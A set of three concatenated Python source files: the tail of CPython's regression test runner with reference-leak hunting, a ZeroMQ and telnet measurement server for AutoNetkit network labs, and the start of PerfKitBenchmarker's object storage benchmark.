except unittest.SkipTest as msg:
if not quiet:
print(test, "skipped --", msg)
sys.stdout.flush()
return SKIPPED, test_time
except KeyboardInterrupt:
raise
except support.TestFailed as msg:
if display_failure:
print("test", test, "failed --", msg, file=sys.stderr)
else:
print("test", test, "failed", file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
except:
msg = traceback.format_exc()
print("test", test, "crashed --", msg, file=sys.stderr)
sys.stderr.flush()
return FAILED, test_time
else:
if refleak:
return FAILED, test_time
if environment.changed:
return ENV_CHANGED, test_time
return PASSED, test_time
def cleanup_test_droppings(testname, verbose):
import shutil
import stat
import gc
# First kill any dangling references to open files etc.
# This can also issue some ResourceWarnings which would otherwise get
# triggered during the following test run, and possibly produce failures.
gc.collect()
# Try to clean up junk commonly left behind. While tests shouldn't leave
# any files or directories behind, when a test fails that can be tedious
# for it to arrange. The consequences can be especially nasty on Windows,
# since if a test leaves a file open, it cannot be deleted by name (while
# there's nothing we can do about that here either, we can display the
# name of the offending test, which is a real help).
for name in (support.TESTFN,
"db_home",
):
if not os.path.exists(name):
continue
if os.path.isdir(name):
kind, nuker = "directory", shutil.rmtree
elif os.path.isfile(name):
kind, nuker = "file", os.unlink
else:
raise SystemError("os.path says %r exists but is neither "
"directory nor file" % name)
if verbose:
print("%r left behind %s %r" % (testname, kind, name))
try:
# if we have chmod, fix possible permissions problems
# that might prevent cleanup
if (hasattr(os, 'chmod')):
os.chmod(name, stat.S_IRWXU | stat.S_IRWXG | stat.S_IRWXO)
nuker(name)
except Exception as msg:
print(("%r left behind %s %r and it couldn't be "
"removed: %s" % (testname, kind, name, msg)), file=sys.stderr)
def dash_R(the_module, test, indirect_test, huntrleaks):
"""Run a test multiple times, looking for reference leaks.
Returns:
False if the test didn't leak references; True if we detected refleaks.
"""
# This code is hackish and inelegant, but it seems to do the job.
import copyreg
import collections.abc
if not hasattr(sys, 'gettotalrefcount'):
raise Exception("Tracking reference leaks requires a debug build "
"of Python")
# Save current values for dash_R_cleanup() to restore.
fs = warnings.filters[:]
ps = copyreg.dispatch_table.copy()
pic = sys.path_importer_cache.copy()
try:
import zipimport
except ImportError:
zdc = None # Run unmodified on platforms without zipimport support
else:
zdc = zipimport._zip_directory_cache.copy()
abcs = {}
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
abcs[obj] = obj._abc_registry.copy()
nwarmup, ntracked, fname = huntrleaks
fname = os.path.join(support.SAVEDCWD, fname)
repcount = nwarmup + ntracked
rc_deltas = [0] * repcount
alloc_deltas = [0] * repcount
print("beginning", repcount, "repetitions", file=sys.stderr)
print(("1234567890"*(repcount//10 + 1))[:repcount], file=sys.stderr)
sys.stderr.flush()
for i in range(repcount):
indirect_test()
alloc_after, rc_after = dash_R_cleanup(fs, ps, pic, zdc, abcs)
sys.stderr.write('.')
sys.stderr.flush()
if i >= nwarmup:
rc_deltas[i] = rc_after - rc_before
alloc_deltas[i] = alloc_after - alloc_before
alloc_before, rc_before = alloc_after, rc_after
print(file=sys.stderr)
# These checkers return False on success, True on failure
def check_rc_deltas(deltas):
return any(deltas)
def check_alloc_deltas(deltas):
# At least 1/3rd of 0s
if 3 * deltas.count(0) < len(deltas):
return True
# Nothing else than 1s, 0s and -1s
if not set(deltas) <= {1,0,-1}:
return True
return False
failed = False
for deltas, item_name, checker in [
(rc_deltas, 'references', check_rc_deltas),
(alloc_deltas, 'memory blocks', check_alloc_deltas)]:
if checker(deltas):
msg = '%s leaked %s %s, sum=%s' % (
test, deltas[nwarmup:], item_name, sum(deltas))
print(msg, file=sys.stderr)
sys.stderr.flush()
with open(fname, "a") as refrep:
print(msg, file=refrep)
refrep.flush()
failed = True
return failed
def dash_R_cleanup(fs, ps, pic, zdc, abcs):
import gc, copyreg
import _strptime, linecache
import urllib.parse, urllib.request, mimetypes, doctest
import struct, filecmp, collections.abc
from distutils.dir_util import _path_created
from weakref import WeakSet
# Clear the warnings registry, so they can be displayed again
for mod in sys.modules.values():
if hasattr(mod, '__warningregistry__'):
del mod.__warningregistry__
# Restore some original values.
warnings.filters[:] = fs
copyreg.dispatch_table.clear()
copyreg.dispatch_table.update(ps)
sys.path_importer_cache.clear()
sys.path_importer_cache.update(pic)
try:
import zipimport
except ImportError:
pass # Run unmodified on platforms without zipimport support
else:
zipimport._zip_directory_cache.clear()
zipimport._zip_directory_cache.update(zdc)
# clear type cache
sys._clear_type_cache()
# Clear ABC registries, restoring previously saved ABC registries.
for abc in [getattr(collections.abc, a) for a in collections.abc.__all__]:
if not isabstract(abc):
continue
for obj in abc.__subclasses__() + [abc]:
obj._abc_registry = abcs.get(obj, WeakSet()).copy()
obj._abc_cache.clear()
obj._abc_negative_cache.clear()
# Flush standard output, so that buffered data is sent to the OS and
# associated Python objects are reclaimed.
for stream in (sys.stdout, sys.stderr, sys.__stdout__, sys.__stderr__):
if stream is not None:
stream.flush()
# Clear assorted module caches.
_path_created.clear()
re.purge()
_strptime._regex_cache.clear()
urllib.parse.clear_cache()
urllib.request.urlcleanup()
linecache.clearcache()
mimetypes._default_mime_types()
filecmp._cache.clear()
struct._clearcache()
doctest.master = None
try:
import ctypes
except ImportError:
# Don't worry about resetting the cache if ctypes is not supported
pass
else:
ctypes._reset_cache()
# Collect cyclic trash and read memory statistics immediately after.
func1 = sys.getallocatedblocks
func2 = sys.gettotalrefcount
gc.collect()
return func1(), func2()
def warm_caches():
# char cache
s = bytes(range(256))
for i in range(256):
s[i:i+1]
# unicode cache
x = [chr(i) for i in range(256)]
# int cache
x = list(range(-5, 257))
def findtestdir(path=None):
return path or os.path.dirname(__file__) or os.curdir
def removepy(names):
if not names:
return
for idx, name in enumerate(names):
basename, ext = os.path.splitext(name)
if ext == '.py':
names[idx] = basename
def count(n, word):
if n == 1:
return "%d %s" % (n, word)
else:
return "%d %ss" % (n, word)
def printlist(x, width=70, indent=4):
"""Print the elements of iterable x to stdout.
Optional arg width (default 70) is the maximum line length.
Optional arg indent (default 4) is the number of blanks with which to
begin each line.
"""
from textwrap import fill
blanks = ' ' * indent
# Print the sorted list: 'x' may be a '--random' list or a set()
print(fill(' '.join(str(elt) for elt in sorted(x)), width,
initial_indent=blanks, subsequent_indent=blanks))
def main_in_temp_cwd():
"""Run main() in a temporary working directory."""
if sysconfig.is_python_build():
try:
os.mkdir(TEMPDIR)
except FileExistsError:
pass
# Define a writable temp dir that will be used as cwd while running
# the tests. The name of the dir includes the pid to allow parallel
# testing (see the -j option).
test_cwd = 'test_python_{}'.format(os.getpid())
test_cwd = os.path.join(TEMPDIR, test_cwd)
# Run the tests in a context manager that temporarily changes the CWD to a
# temporary and writable directory. If it's not possible to create or
# change the CWD, the original CWD will be used. The original CWD is
# available from support.SAVEDCWD.
with support.temp_cwd(test_cwd, quiet=True):
main()
if __name__ == '__main__':
# Remove regrtest.py's own directory from the module search path. Despite
# the elimination of implicit relative imports, this is still needed to
# ensure that submodules of the test package do not inappropriately appear
# as top-level modules even when people (or buildbots!) invoke regrtest.py
# directly instead of using the -m switch
mydir = os.path.abspath(os.path.normpath(os.path.dirname(sys.argv[0])))
i = len(sys.path)
while i >= 0:
i -= 1
if os.path.abspath(os.path.normpath(sys.path[i])) == mydir:
del sys.path[i]
# findtestdir() gets the dirname out of __file__, so we have to make it
# absolute before changing the working directory.
# For example __file__ may be relative when running trace or profile.
# See issue #9323.
__file__ = os.path.abspath(__file__)
# sanity check
assert __file__ == os.path.abspath(sys.argv[0])
main_in_temp_cwd()
|
server.py
|
"""Zmq based measurement server"""
# based on https://learning-0mq-with-pyzmq.readthedocs.org/en/latest/pyzmq/patterns/pushpull.html
import zmq
import json
import socket as python_socket
import telnetlib
from threading import Thread
import time
import sys
def streamer_device(port_in, port_out):
from zmq.devices import ProcessDevice
pd = ProcessDevice(zmq.QUEUE, zmq.PULL, zmq.PUSH)
pd.bind_in('tcp://*:%s' % port_in)
pd.bind_out('tcp://*:%s' % port_out)
pd.setsockopt_in(zmq.IDENTITY, 'PULL')
pd.setsockopt_out(zmq.IDENTITY, 'PUSH')
pd.start()
# it will now be running in a background process
def forwarder_device(port_in, port_out):
from zmq.devices import ProcessDevice
pd = ProcessDevice(zmq.FORWARDER, zmq.SUB, zmq.PUB)
pd.bind_in('tcp://*:%s' % port_in)
pd.bind_out('tcp://*:%s' % port_out)
pd.setsockopt_in(zmq.IDENTITY, 'SUB')
pd.setsockopt_in(zmq.SUBSCRIBE, "")
pd.setsockopt_out(zmq.IDENTITY, 'PUB')
pd.start()
# it will now be running in a background process
CONNECTORS = {}
#TODO: inherit from base autonetkit connector abstract function
def netkit_connector(host, username, password, command, *args, **kwargs):
#Note: user prompt and priv prompt have same password
vtysh = kwargs.get("vtysh", False)
print host, username, password, command, vtysh
print "Connecting to %s" % (host)
try:
tn = telnetlib.Telnet(host, timeout = 10)
except Exception, e:
print "Unable to connect to %s: %s" % (host, e)
return
tn.set_debuglevel(0)
print "Connected to %s" % host
welcome_banner = tn.read_until("login:", timeout = 10)
last_line = welcome_banner.splitlines()[-1]
hostname = last_line.replace("login:", "").strip()
linux_prompt = hostname + ":~#"
print "Hostname is %s" % hostname
#TODO: check why need the below for ascii/unicode/pzmq?
tn.write(username + '\n')
tn.read_until("Password:", timeout = 10)
tn.write(password + '\n')
tn.read_until(linux_prompt, timeout = 10)
if vtysh:
vtysh_prompt = hostname + "#"
tn.write("vtysh" + "\n")
tn.read_until(vtysh_prompt, timeout = 10)
tn.write("terminal length 0" + "\n")
tn.read_until(vtysh_prompt, timeout = 10)
tn.write(command + "\n")
result = tn.read_until(vtysh_prompt, timeout = 10)
tn.write("exit" + "\n")
#TODO: check if need to parse result also to strip out prompt
else:
tn.write(command + "\n")
result = tn.read_until(linux_prompt, timeout = 10)
result = "\n".join(result.splitlines()[1:-1])
print "Finished for %s" % hostname
tn.write("exit" + "\n")
return hostname, result
CONNECTORS['netkit'] = netkit_connector
try:
import autonetkit_cisco
import autonetkit_cisco.measure_connectors
except ImportError:
pass # not installed
else:
CONNECTORS['iosv_ns'] = autonetkit_cisco.measure_connectors.iosv_ns_connector
CONNECTORS['csr1000v_ns'] = autonetkit_cisco.measure_connectors.iosv_ns_connector
CONNECTORS['ios_xrv_ns'] = autonetkit_cisco.measure_connectors.ios_xrv_ns_connector
CONNECTORS['nx_osv_ns'] = autonetkit_cisco.measure_connectors.nx_osv_ns_connector
CONNECTORS['ubuntu_ns'] = autonetkit_cisco.measure_connectors.linux_ns_connector
def do_connect(**kwargs):
#TODO: use a function map
connector = kwargs.get("connector")
connector_fn = CONNECTORS[connector] #TODO: capture if not found
try:
return connector_fn(**kwargs)
except EOFError:
print "Unable to connect with connector %s" % connector
return ""
def worker():
context = zmq.Context()
# recieve work
consumer_receiver = context.socket(zmq.PULL)
consumer_receiver.connect("tcp://127.0.0.1:5560")
# send work
consumer_sender = context.socket(zmq.PUB)
consumer_sender.connect("tcp://127.0.0.1:5561")
while True:
# Wait for next request from client
print "Waiting for message"
work = consumer_receiver.recv_json()
#socket.send(json.dumps("hello"))
#continue
print "Received request: ", work
data = json.loads(work)
host = data['host'] #TODO: rename this to host_ip
#TODO: add support for host port (default 23)
connector = data['connector']
username = data['username']
password = data['password']
command = data['command']
message_key = data['message_key']
vtysh = data.get('vtysh', False)
message_key = str(message_key)
username = str(username)
password = str(password)
command = str(command)
print "command is", command
data = {k: str(v) for k, v in data.items()}
try:
hostname, result = do_connect(**data)
success = True
except Exception, e:
print e
hostname = ""
success = False
result = str(e)
if "No route to host" in e:
# simpler message
result = "No route to host"
if "pexpect.TIMEOUT" in str(e):
#TODO: test for timeout exception directly
result = "Pexpect timeout"
finally:
try:
data = str(data)
hostname = str(hostname)
result = str(result)
message = json.dumps({'command': work,
"success": success,
'hostname': hostname,
'result': result})
except Exception, e:
print "cant dump", e
else:
consumer_sender.send("%s %s" % (message_key, message))
print "Sent to zmq"
def main():
num_worker_threads = 5
try:
num_worker_threads = int(sys.argv[1])
except IndexError:
pass
#NOTE: need pts/x available for worst-case of all threads at once
for i in range(num_worker_threads):
t = Thread(target=worker)
t.daemon = True
t.start()
# start the streamer device
streamer_device(5559, 5560)
forwarder_device(5561, 5562)
while True:
time.sleep(1)
if __name__ == "__main__":
main()
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access storage provider.
For 1), we aim to simulate one typical use case of common user using storage
provider: upload and downloads a set of files with different sizes from/to a
local directory.
For 2), we aim to measure more directly the performance of a storage provider
by accessing them via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import enum
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
from absl import flags
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
'api_multistream_writes: runs API-based benchmarking with '
'multiple upload streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted, and the list of object names will be written '
'to a file with the specified prefix in the following '
'format: <bucket>/<object>. This prefix can be passed to '
'this benchmark in a later run via via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
'number of hours before (as specifed by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
'If set, the worker threads\' output will be written to the'
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
flags.DEFINE_boolean(
'object_storage_bulk_delete', False,
'If true, deletes objects with bulk delete client request and records '
'average latency per object. Otherwise, deletes one object per request '
'and records individual delete latency'
)
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
REMOTE_PACKAGE_DIR = posixpath.join(SCRIPT_DIR, 'providers')
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 100
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# do the uploads or downloads of 100 test files sequentially, it takes
# a very long time for each iteration, so we are doing only 3 iterations.
CLI_TEST_ITERATION_COUNT_AZURE = 3
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Some times even when a bucket is completely empty, the service provider would
# refuse to remove the bucket with "BucketNotEmpty" error until up to 1 hour
# later. We keep trying until we reach the one-hour limit. And this wait is
# necessary for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# Max number of delete operations per second
MULTISTREAM_DELETE_OPS_PER_SEC = 3500
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
class MultistreamOperationType(enum.Enum):
"""MultiStream Operations supported by object_storage_api_tests script."""
download = 1
upload = 2
delete = 3
bulk_delete = 4
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip3 show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
def MultiThreadDeleteDelay(num_vms, threads_per_vm):
"""Calculates delay time between delete operation.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
float. Delay time in seconds based on number of vms and threads and the
maximum number of delete operations per second.
"""
return (num_vms * threads_per_vm) / (MULTISTREAM_DELETE_OPS_PER_SEC)
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
operation: 'upload' or 'download'. The operation the results are from.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
min_num_records = min((len(start_time) for start_time in start_times))
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = np.full(num_streams, 0)
for index, start_time in enumerate(start_times):
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes[index] = i
break
active_stop_indexes = np.full(num_streams, min_num_records)
for index, stop_time in enumerate(stop_times):
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes[index] = i + 1
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
this_size_metadata['object_size_B'] = size
logging.info('Processing multi-stream %s results for object size %s',
operation, size)
_AppendPercentilesToResults(
results,
all_active_latencies[all_active_sizes == size],
latency_prefix,
LATENCY_UNIT,
this_size_metadata)
# Record samples for individual downloads and uploads if requested.
if FLAGS.record_individual_latency_samples:
for latency in all_active_latencies[all_active_sizes == size]:
results.append(
sample.Sample('%s individual' % latency_prefix, latency,
LATENCY_UNIT, this_size_metadata))
# Build the object latency histogram if user requested it
if FLAGS.object_storage_latency_histogram_interval and any(
size in x for x in sizes):
histogram_interval = FLAGS.object_storage_latency_histogram_interval
hist_latencies = [[l for l, s in zip(*w_l_s) if s == size]
for w_l_s in zip(latencies, sizes)]
max_latency = max([max(l) for l in hist_latencies])
# Note that int() floors for us
num_histogram_buckets = int(max_latency / histogram_interval) + 1
histogram_buckets = [0 for _ in range(num_histogram_buckets)]
for worker_latencies in hist_latencies:
for latency in worker_latencies:
# Note that int() floors for us
histogram_buckets[int(latency / histogram_interval)] += 1
histogram_str = ','.join([str(c) for c in histogram_buckets])
histogram_metadata = this_size_metadata.copy()
histogram_metadata['interval'] = histogram_interval
histogram_metadata['histogram'] = histogram_str
results.append(sample.Sample(
'Multi-stream %s latency histogram' % operation,
0.0, 'histogram', metadata=histogram_metadata))
# Throughput metrics
total_active_times = [np.sum(latency) for latency in active_latencies]
active_durations = [stop_times[i][active_stop_indexes[i] - 1] -
start_times[i][active_start_indexes[i]]
for i in range(num_streams)]
total_active_sizes = [np.sum(size) for size in active_sizes]
# 'net throughput (with gap)' is computed by taking the throughput
# for each stream (total # of bytes transmitted / (stop_time -
# start_time)) and then adding the per-stream throughputs. 'net
# throughput' is the same, but replacing (stop_time - start_time)
# with the sum of all of the operation latencies for that thread, so
